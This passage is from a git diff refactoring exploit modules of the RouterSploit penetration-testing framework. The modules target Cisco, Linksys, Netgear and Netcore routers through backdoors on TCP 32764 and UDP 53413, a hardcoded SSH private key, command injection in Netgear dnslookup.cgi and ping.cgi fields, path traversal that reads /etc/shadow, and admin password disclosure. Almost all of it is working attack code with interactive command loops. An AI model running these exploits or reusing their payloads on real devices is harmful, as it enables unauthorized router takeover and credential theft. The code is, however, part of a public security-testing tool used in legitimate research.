llYOUI+SpLJ6/vURRbHSnnn8a/XG+nzedGH5JGqEJNQsz+xT2axM0/W/CRknmGaJ + kda/AoGANWrLCz708y7VYgAtW2Uf1DPOIYMdvo6fxIB5i9ZfISgcJ/bbCUkFrhoH + +vq/5CIWxCPp0f85R4qxxQ5ihxJ0YDQT9Jpx4TMss4PSavPaBH3RXow5Ohe+bYoQ + NE5OgEXk2wVfZczCZpigBKbKZHNYcelXtTt/nP3rsCuGcM4h53s= + -----END RSA PRIVATE KEY----- + """ + } + ] - valid = None + self.valid = None def run(self): if self.check(): - if "DSA PRIVATE KEY" in self.valid['private_key']: - pkey = paramiko.DSSKey.from_private_key(StringIO.StringIO(self.valid['private_key'])) - elif "RSA PRIVATE KEY" in self.valid['private_key']: - pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(self.valid['private_key'])) - - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - try: - ssh.connect(self.target, self.ssh_port, timeout=5, username=self.valid['user'], pkey=pkey) - except Exception: + ssh = self.ssh_login(self.valid["user"], self.valid["private_key"]) + if ssh: + ssh_interactive(ssh) ssh.close() - print_error("Device seems to be not vulnerable") else: - print_success("SSH - Successful authentication") - ssh_interactive(ssh) + print_error("Device seems to be not vulnerable") else: print_error("Exploit failed - target seems to be not vulnerable") @mute def check(self): for key in self.private_keys: - if "DSA PRIVATE KEY" in key['private_key']: - pkey = paramiko.DSSKey.from_private_key(StringIO.StringIO(key['private_key'])) - elif "RSA PRIVATE KEY" in key['private_key']: - pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(key['private_key'])) - else: - continue - - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - try: - ssh.connect(self.target, self.ssh_port, timeout=5, username=key['user'], pkey=pkey) - except Exception: + ssh = self.ssh_login_pkey(key["user"], key["private_key"]) + if ssh: ssh.close() - else: self.valid = key return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/multi/tcp_32764_info_disclosure.py b/routersploit/modules/exploits/routers/multi/tcp_32764_info_disclosure.py index 442a2a85e..d93bc99c7 100644 --- a/routersploit/modules/exploits/routers/multi/tcp_32764_info_disclosure.py +++ b/routersploit/modules/exploits/routers/multi/tcp_32764_info_disclosure.py @@ -1,71 +1,61 @@ -import socket import struct import re +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_table, - random_text, - mute, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for backdoor functionality. - If the target is vulnerable it allows to fetch credentials for administrator user. - """ + +class Exploit(TCPClient): __info__ = { - 'name': 'TCP-32764 Info Disclosure', - 'description': 'Exploits backdoor functionality that allows fetching credentials for administrator user.', - 'authors': [ - 'Eloi Vanderbeken', # vulnerability discovery & proof of concept exploit - 'Marcin Bury ', # routersploit module + "name": "TCP-32764 Info Disclosure", + "description": "Exploits backdoor functionality that allows fetching " + "credentials for administrator user.", + "authors": [ + "Eloi Vanderbeken", # vulnerability discovery & proof of concept exploit + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://github.com/elvanderb/TCP-32764', + "references": [ + "https://github.com/elvanderb/TCP-32764", ], - 'devices': [ - 'Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5', - 'Cisco WAP4410N', - 'Cisco WRVS4400N', - 'Cisco WRVS4400N', - 'Diamond DSL642WLG / SerComm IP806Gx v2 TI', - 'LevelOne WBR3460B', - 'Linksys RVS4000 Firmware V1.3.3.5', - 'Linksys WAG120N', - 'Linksys WAG160n v1 and v2', - 'Linksys WAG200G', - 'Linksys WAG320N', - 'Linksys WAG54G2', - 'Linksys WAG54GS', - 'Linksys WRT350N v2 fw 2.00.19', - 'Linksys WRT300N fw 2.00.17', - 'Netgear DG834', - 'Netgear DGN1000', - 'Netgear DGN2000B', - 'Netgear DGN3500', - 'Netgear DGND3300', - 'Netgear DGND3300Bv2 fwv 2.1.00.53_1.00.53GR', - 'Netgear DM111Pv2', - 'Netgear JNR3210', + "devices": [ + "Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5", + "Cisco WAP4410N", + "Cisco WRVS4400N", + "Cisco WRVS4400N", + "Diamond DSL642WLG / SerComm IP806Gx v2 TI", + "LevelOne WBR3460B", + "Linksys RVS4000 Firmware V1.3.3.5", + "Linksys WAG120N", + "Linksys WAG160n v1 and v2", + "Linksys WAG200G", + "Linksys WAG320N", + "Linksys WAG54G2", + "Linksys WAG54GS", + "Linksys WRT350N v2 fw 2.00.19", + "Linksys WRT300N fw 2.00.17", + "Netgear DG834", + "Netgear DGN1000", + "Netgear DGN2000B", + "Netgear DGN3500", + "Netgear DGND3300", + "Netgear DGND3300Bv2 fwv 2.1.00.53_1.00.53GR", + "Netgear DM111Pv2", + "Netgear JNR3210", ], } - target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address - endianness = "<" + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(32764, "Target TCP port") + + def __init__(self): + self.endianness = "<" def run(self): if self.check(): print_success("Target is vulnerable") - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(30) - s.connect((self.target, 32764)) + tcp_client = self.tcp_connect() + conf = self.execute(tcp_client, 1) - conf = self.execute(s, 1) lines = re.split("\x00|\x01", conf) pattern = re.compile('user(name)?|password|login') @@ -84,10 +74,10 @@ def run(self): else: print_error("Target is not vulnerable") - def execute(self, s, message, payload=""): + def execute(self, tcp_client, message, payload=""): header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1) - s.send(header + payload + "\x00") - r = s.recv(0xC) + self.tcp_send(tcp_client, header + payload + "\x00") + r = self.tcp_recv(tcp_client, 0xC) while len(r) < 0xC: tmp = s.recv(0xC - len(r)) @@ -100,13 +90,15 @@ def execute(self, s, message, payload=""): ret_str = "" while len(ret_str) < ret_len: - tmp = s.recv(ret_len - len(ret_str)) + tmp = self.tcp_recv(tcp_client, ret_len - len(ret_str)) ret_str += tmp return ret_str @mute def check(self): + return False + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) @@ -115,7 +107,7 @@ def check(self): except socket.error: return False # target is not vulnerable - s.send(random_text(12)) + s.send(utils.random_text(12)) r = s.recv(0xC) while len(r) < 0xC: diff --git a/routersploit/modules/exploits/routers/multi/tcp_32764_rce.py b/routersploit/modules/exploits/routers/multi/tcp_32764_rce.py index bdf5e0765..73cf97015 100644 --- a/routersploit/modules/exploits/routers/multi/tcp_32764_rce.py +++ b/routersploit/modules/exploits/routers/multi/tcp_32764_rce.py @@ -1,61 +1,52 @@ -import socket import struct +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - print_info, - random_text, - mute, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for backdoor functionality. - If the target is vulnerable it allows to execute command on operating system level. - """ + +class Exploit(TCPClient): __info__ = { - 'name': 'TCP-32764 RCE', - 'description': 'Exploits backdoor functionality that allows executing commands on operating system level.', - 'authors': [ - 'Eloi Vanderbeken', # vulnerability discovery & proof of concept exploit - 'Marcin Bury ', # routersploit module + "name": "TCP-32764 RCE", + "description": "Exploits backdoor functionality that allows executing commands " + "on operating system level.", + "authors": [ + "Eloi Vanderbeken", # vulnerability discovery & proof of concept exploit + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://github.com/elvanderb/TCP-32764', + "references": [ + "https://github.com/elvanderb/TCP-32764", ], - 'devices': [ - 'Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5', - 'Cisco WAP4410N', - 'Cisco WRVS4400N', - 'Cisco WRVS4400N', - 'Diamond DSL642WLG / SerComm IP806Gx v2 TI', - 'LevelOne WBR3460B', - 'Linksys RVS4000 Firmware V1.3.3.5', - 'Linksys WAG120N', - 'Linksys WAG160n v1 and v2', - 'Linksys WAG200G', - 'Linksys WAG320N', - 'Linksys WAG54G2', - 'Linksys WAG54GS', - 'Linksys WRT350N v2 fw 2.00.19', - 'Linksys WRT300N fw 2.00.17', - 'Netgear DG834', - 'Netgear DGN1000', - 'Netgear DGN2000B', - 'Netgear DGN3500', - 'Netgear DGND3300', - 'Netgear DGND3300Bv2 fwv 2.1.00.53_1.00.53GR', - 'Netgear DM111Pv2', - 'Netgear JNR3210', + "devices": [ + "Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5", + "Cisco WAP4410N", + "Cisco WRVS4400N", + "Cisco WRVS4400N", + "Diamond DSL642WLG / SerComm IP806Gx v2 TI", + "LevelOne WBR3460B", + "Linksys RVS4000 Firmware V1.3.3.5", + "Linksys WAG120N", + "Linksys WAG160n v1 and v2", + "Linksys WAG200G", + "Linksys WAG320N", + "Linksys WAG54G2", + "Linksys WAG54GS", + "Linksys WRT350N v2 fw 2.00.19", + "Linksys WRT300N fw 2.00.17", + "Netgear DG834", + "Netgear DGN1000", + "Netgear DGN2000B", + "Netgear DGN3500", + "Netgear DGND3300", + "Netgear DGND3300Bv2 fwv 2.1.00.53_1.00.53GR", + "Netgear DM111Pv2", + "Netgear JNR3210", ], } - target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address - endianness = "<" + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(32764, "Target TCP port") + + def __init__(self): + self.endianness = "<" def run(self): if self.check(): @@ -70,8 +61,8 @@ def command_loop(self): s.settimeout(30) s.connect((self.target, 32764)) - while(1): - cmd = raw_input("cmd > ") + while True: + cmd = input("cmd > ") if cmd in ['quit', 'exit']: s.close() @@ -102,6 +93,8 @@ def execute(self, s, message, payload=""): @mute def check(self): + return False + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) @@ -110,7 +103,7 @@ def check(self): except socket.error: return False # target is not vulnerable - s.send(random_text(12)) + s.send(utils.random_text(12)) r = s.recv(0xC) while len(r) < 0xC: @@ -129,7 +122,7 @@ def check(self): s.settimeout(30) s.connect((self.target, 32764)) - mark = random_text(32) + mark = utils.random_text(32) cmd = 'echo "{}"'.format(mark) response = self.execute(s, 7, cmd) s.close() diff --git a/routersploit/modules/exploits/routers/netcore/udp_53413_rce.py b/routersploit/modules/exploits/routers/netcore/udp_53413_rce.py index 248c224f1..1927f99c6 100644 --- a/routersploit/modules/exploits/routers/netcore/udp_53413_rce.py +++ b/routersploit/modules/exploits/routers/netcore/udp_53413_rce.py @@ -1,38 +1,28 @@ -import socket +from routersploit.core.exploit import * +from routersploit.core.udp.udp_client import UDPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - mute, - shell, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netcore/Netis backdoor functionality. - If the target is vulnerable it allows to execute command on operating system level. - """ +class Exploit(UDPClient): __info__ = { - 'name': 'Netcore/Netis UDP 53413 RCE', - 'authors': [ - 'Tim Yeh, Trend Micro', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'description': 'Exploits Netcore/Netis backdoor functionality that allows executing commands on operating system level.', - 'references': [ - 'https://www.seebug.org/vuldb/ssvid-90227', - 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/', - ], - 'devices': [ - 'Netcore', - 'Netis', + "name": "Netcore/Netis UDP 53413 RCE", + "authors": [ + "Tim Yeh, Trend Micro", # vulnerability discovery + "Marcin Bury ", # routersploit module ], + "description": "Exploits Netcore/Netis backdoor functionality that allows " + "executing commands on operating system level.", + "references": ( + "https://www.seebug.org/vuldb/ssvid-90227", + "http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/", + ), + "devices": ( + "Netcore Router", + "Netis Router", + ), } - target = exploits.Option('', 'Target IP address') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(53413, "Target UDP port") def run(self): if self.check(): @@ -43,16 +33,15 @@ def run(self): print_error("Target is not vulnerable") def execute(self, cmd): - payload = "AA\x00\x00AAAA" + cmd + "\x00" - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(10.0) + cmd = bytes(cmd, "utf-8") - try: - sock.sendto(payload, (self.target, 53413)) - response = sock.recv(1024) - return response[8:] - except Exception: - pass + payload = b"AA\x00\x00AAAA" + cmd + b'\x00' + udp_client = self.udp_create() + self.udp_send(udp_client, payload) + response = self.udp_recv(udp_client, 1024) + + if response: + return str(response[8:], "utf-8") return "" @@ -61,18 +50,15 @@ def check(self): response = "" payload = "\x00" * 8 - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(10.0) - - try: - sock.sendto(payload, (self.target, 53413)) - response = sock.recv(1024) - except Exception: - pass + udp_client = self.udp_create() + self.udp_send(udp_client, payload) + if udp_client: + response = self.udp_recv(udp_client, 1024) - if response.endswith("\xD0\xA5Login:"): - return True # target is vulnerable - elif response.endswith("\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00"): - return True # target is vulnerable + if response: + if response.endswith("\xD0\xA5Login:"): + return True # target is vulnerable + elif response.endswith("\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00"): + return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/netgear/dgn2200_dnslookup_cgi_rce.py b/routersploit/modules/exploits/routers/netgear/dgn2200_dnslookup_cgi_rce.py index f16aa2d3d..8dcc045ac 100644 --- a/routersploit/modules/exploits/routers/netgear/dgn2200_dnslookup_cgi_rce.py +++ b/routersploit/modules/exploits/routers/netgear/dgn2200_dnslookup_cgi_rce.py @@ -1,41 +1,32 @@ -from routersploit import ( - exploits, - print_status, - mute, - validators, - http_request, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear DGN2200 RCE', - 'description': 'Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource', - 'authors': [ - 'SivertPL', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear DGN2200 RCE", + "description": "Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource.", + "authors": [ + "SivertPL", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/41459/', - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334', + "references": [ + "https://www.exploit-db.com/exploits/41459/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334", ], - 'devices': [ - 'Netgear DGN2200v1', - 'Netgear DGN2200v2', - 'Netgear DGN2200v3', - 'Netgear DGN2200v4', + "devices": [ + "Netgear DGN2200v1", + "Netgear DGN2200v2", + "Netgear DGN2200v3", + "Netgear DGN2200v4", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target Port') # target port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('admin', 'Username') - password = exploits.Option('password', 'Password') + username = OptString("admin", "Username") + password = OptString("password", "Password") def run(self): print_status("It is not possible to check if target is vulnerable") @@ -44,15 +35,18 @@ def run(self): shell(self, architecture="mipsbe") def execute(self, cmd): - url = "{}:{}/dnslookup.cgi".format(self.target, self.port) - payload = "www.google.com; {}".format(cmd) data = { "host_name": payload, "lookup": "Lookup" } - http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) + self.http_request( + method="POST", + path="/dnslookup.cgi", + data=data, + auth=(self.username, self.password) + ) return "" @mute diff --git a/routersploit/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py b/routersploit/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py index 09488c497..7a5ef9e5e 100644 --- a/routersploit/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py +++ b/routersploit/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py @@ -1,49 +1,34 @@ -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - mute, - validators, - http_request, - random_text, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploits Netgear DGN2200 RCE vulnerability in ping.cgi - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear DGN2200 RCE', - 'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script', - 'authors': [ - 'SivertPL', # vulnerability discovery - 'Josh Abraham ', # routesploit module + "name": "Netgear DGN2200 RCE", + "description": "Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script.", + "authors": [ + "SivertPL", # vulnerability discovery + "Josh Abraham ", # routesploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/41394/', - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077', + "references": [ + "https://www.exploit-db.com/exploits/41394/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077", ], - 'devices': [ - 'Netgear DGN2200v1', - 'Netgear DGN2200v2', - 'Netgear DGN2200v3', - 'Netgear DGN2200v4', + "devices": [ + "Netgear DGN2200v1", + "Netgear DGN2200v2", + "Netgear DGN2200v3", + "Netgear DGN2200v4", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target Port') # target port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - login = exploits.Option('admin', 'Username') - password = exploits.Option('password', 'Password') + username = OptString("admin", "Username") + password = OptString("password", "Password") def run(self): - """ - Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target. - """ if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") @@ -52,17 +37,29 @@ def run(self): print_error("Target is not vulnerable") def execute(self, command): - url = "{}:{}/ping.cgi".format(self.target, self.port) - data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command} + data = { + "IPAddr1": 12, + "IPAddr2": 12, + "IPAddr3": 12, + "IPAddr4": 12, + "ping": "Ping", + "ping_IPAddr": "12.12.12.12; " + command + } referer = "{}/DIAG_diag.htm".format(self.target) headers = {'referer': referer} - r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers) + r = self.http_request( + method="POST", + path="/ping.cgi", + data=data, + auth=(self.username, self.password), + headers=headers + ) if r is None: return "" result = self.parse_output(r.text) - return result.encode('utf-8') + return result def parse_output(self, text): yet = False @@ -82,7 +79,7 @@ def check(self): """ Method that verifies if the target is vulnerable. """ - rand_marker = random_text(6) + rand_marker = utils.random_text(6) command = "echo {}".format(rand_marker) if rand_marker in self.execute(command): diff --git a/routersploit/modules/exploits/routers/netgear/jnr1010_path_traversal.py b/routersploit/modules/exploits/routers/netgear/jnr1010_path_traversal.py index 94c2224f3..e246099f9 100644 --- a/routersploit/modules/exploits/routers/netgear/jnr1010_path_traversal.py +++ b/routersploit/modules/exploits/routers/netgear/jnr1010_path_traversal.py @@ -1,47 +1,42 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Netgear JNR1010 Path Traversal vulnerability. - If the target is vulnerable, content of the specified file is returned. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear JNR1010 Path Traversal', - 'description': 'Module exploits Netgear JNR1010 Path Traversal vulnerability which allows to read any file on the system.', - 'authors': [ - 'Todor Donev ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear JNR1010 Path Traversal", + "description": "Module exploits Netgear JNR1010 Path Traversal vulnerability " + "which allows to read any file on the system.", + "authors": [ + "Todor Donev ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/40736/', + "references": [ + "https://www.exploit-db.com/exploits/40736/", ], - 'devices': [ - 'Netgear JNR1010', + "devices": [ + "Netgear JNR1010", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('admin', 'Username to log in') - password = exploits.Option('password', 'Password to log in') + username = OptString("admin", "Username to log in") + password = OptString("password", "Password to log in") - filename = exploits.Option('/etc/shadow', 'File to read') + filename = OptString("/etc/shadow", "File to read") def run(self): if self.check(): - url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home".format(self.target, self.port, self.filename) + path = "/cgi-bin/webproc?getpage={}&var:language=en_us&var:language=en_us" \ + "&var:menu=advanced&var:page=basic_home".format(self.filename) - response = http_request(method="GET", url=url, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path=path, + auth=(self.username, self.password) + ) if response is None: return @@ -55,13 +50,18 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home".format(self.target, self.port) + path = "/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:language=en_us" \ + "&var:menu=advanced&var:page=basic_home" - response = http_request(method="GET", url=url, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path=path, + auth=(self.username, self.password), + ) if response is None: return False # target is not vulnerable - if "root:" in response.text: + if utils.detect_file_content(response.text, "/etc/passwd"): return True # target vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/netgear/multi_password_disclosure-2017-5521.py b/routersploit/modules/exploits/routers/netgear/multi_password_disclosure-2017-5521.py index 8b4d3b366..7c1652d36 100644 --- a/routersploit/modules/exploits/routers/netgear/multi_password_disclosure-2017-5521.py +++ b/routersploit/modules/exploits/routers/netgear/multi_password_disclosure-2017-5521.py @@ -1,68 +1,59 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for multiple NETGEAR routers password disclosure vulnerability. - If the target is vulnerable, it allows to read credentials for administration user. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear Multi Password Disclosure', - 'description': 'Module exploits Password Disclosure vulnerability in multiple Netgear devices. ' - 'If target is vulnerable administrator\'s password is retrieved. ' - 'This exploit only works if \'password recovery\' in router settings is OFF. ' - 'If the exploit has already been run, then it might not work anymore until device reboot.', - 'authors': [ - 'Simon Kenin ', # vulnerability discovery - '0BuRner', # routersploit module + "name": "Netgear Multi Password Disclosure", + "description": "Module exploits Password Disclosure vulnerability in multiple Netgear devices. " + "If target is vulnerable administrator\'s password is retrieved. " + "This exploit only works if \'password recovery\' in router settings is OFF. " + "If the exploit has already been run, then it might not work anymore until device reboot.", + "authors": [ + "Simon Kenin ", # vulnerability discovery + "0BuRner", # routersploit module ], - 'references': [ - 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911', - 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/', - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521', - 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521', - 'http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability' + "references": [ + "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/", + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521", + "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521", + "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability", ], - 'devices': [ - 'Netgear D6220', - 'Netgear D6400', - 'Netgear R6200v2', - 'Netgear R6250', - 'Netgear R6300v2', - 'Netgear R6400', - 'Netgear R6700', - 'Netgear R6900', - 'Netgear R7000', - 'Netgear R7100LG', - 'Netgear R7300DST', - 'Netgear R7900', - 'Netgear R8000', - 'Netgear R8300', - 'Netgear R8500', - 'Netgear WNDR3400v2', - 'Netgear WNDR3400v3', - 'Netgear WNR3500Lv2', - 'Netgear WNDR4500v2', + "devices": [ + "Netgear D6220", + "Netgear D6400", + "Netgear R6200v2", + "Netgear R6250", + "Netgear R6300v2", + "Netgear R6400", + "Netgear R6700", + "Netgear R6900", + "Netgear R7000", + "Netgear R7100LG", + "Netgear R7300DST", + "Netgear R7900", + "Netgear R8000", + "Netgear R8300", + "Netgear R8500", + "Netgear WNDR3400v2", + "Netgear WNDR3400v3", + "Netgear WNR3500Lv2", + "Netgear WNDR4500v2", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") - url = "{}:{}".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/", + ) if response is not None: # Detect model @@ -77,8 +68,10 @@ def run(self): print_status("Token found: {}".format(token)) # Detect firmware version - url = "{}:{}/currentsetting.htm".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/currentsetting.htm", + ) fw_version = "" if response is not None and response.status_code == 200: fw_version = self.scrape(response.text, 'Firmware=', 'RegionTag').strip('\r\n') @@ -86,8 +79,11 @@ def run(self): print_status("Detected model: {} (FW: {})".format(model, fw_version)) # Exploit vulnerability - url = "{}:{}/passwordrecovered.cgi?id={}".format(self.target, self.port, token) - response = http_request(method="POST", url=url) + path = "/passwordrecovered.cgi?id={}".format(token) + response = self.http_request( + method="POST", + path=path + ) if response.text.find('left\">') != -1: username, password = self.extract_password(response.text) @@ -126,9 +122,10 @@ def extract_password(html): @mute def check(self): - url = "{}:{}".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/" + ) if response is not None: header = response.headers.get('WWW-Authenticate') diff --git a/routersploit/modules/exploits/routers/netgear/multi_rce.py b/routersploit/modules/exploits/routers/netgear/multi_rce.py index ebeb79876..19825fae3 100644 --- a/routersploit/modules/exploits/routers/netgear/multi_rce.py +++ b/routersploit/modules/exploits/routers/netgear/multi_rce.py @@ -1,63 +1,51 @@ -from routersploit import ( - exploits, - print_status, - print_success, - print_error, - random_text, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for multiple Netgear's Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Netgear Multi RCE', - 'description': 'Module exploits remote command execution in multiple Netgear devices. If the target is ' - 'vulnerable, command loop is invoked that allows executing commands on operating system level.', - 'authors': [ - 'Andrei Costin ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Netgear Multi RCE", + "description": "Module exploits remote command execution in multiple Netgear devices. If the target is " + "vulnerable, command loop is invoked that allows executing commands on operating system level.", + "authors": [ + "Andrei Costin ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://firmware.re/vulns/acsa-2015-001.php', - 'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf', + "references": [ + "http://firmware.re/vulns/acsa-2015-001.php", + "https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf", ], - 'devices': [ - 'Netgear WG102', - 'Netgear WG103', - 'Netgear WN604', - 'Netgear WNDAP350', - 'Netgear WNDAP360', - 'Netgear WNAP320', - 'Netgear WNAP210', - 'Netgear WNDAP660', - 'Netgear WNDAP620', - 'Netgear WNDAP380R', - 'Netgear WNDAP380R(v2)', - 'Netgear WN370', - 'Netgear WND930', + "devices": [ + "Netgear WG102", + "Netgear WG103", + "Netgear WN604", + "Netgear WNDAP350", + "Netgear WNDAP360", + "Netgear WNAP320", + "Netgear WNAP210", + "Netgear WNDAP660", + "Netgear WNDAP620", + "Netgear WNDAP380R", + "Netgear WNDAP380R(v2)", + "Netgear WN370", + "Netgear WND930", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - arch = exploits.Option('mipsbe', 'Target architecture: mipsbe, mipsle') + arch = OptString('mipsbe', 'Target architecture: mipsbe, mipsle') - resources = ['boardData102.php', 'boardData103.php', 'boardDataNA.php', 'boardDataWW.php', 'boardDataJP.php'] - valid_resource = None + def __init__(self): + self.resources = ['boardData102.php', 'boardData103.php', 'boardDataNA.php', 'boardDataWW.php', 'boardDataJP.php'] + self.valid_resource = None def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - print_status("It is blind command injection - response is not available") + print_status("It is blind command injection - response is not available. Use reverse_tcp ") if self.arch == "mipsbe": shell(self, architecture="mipsbe", method="wget", location="/tmp") @@ -67,23 +55,29 @@ def run(self): print_error("Target is not 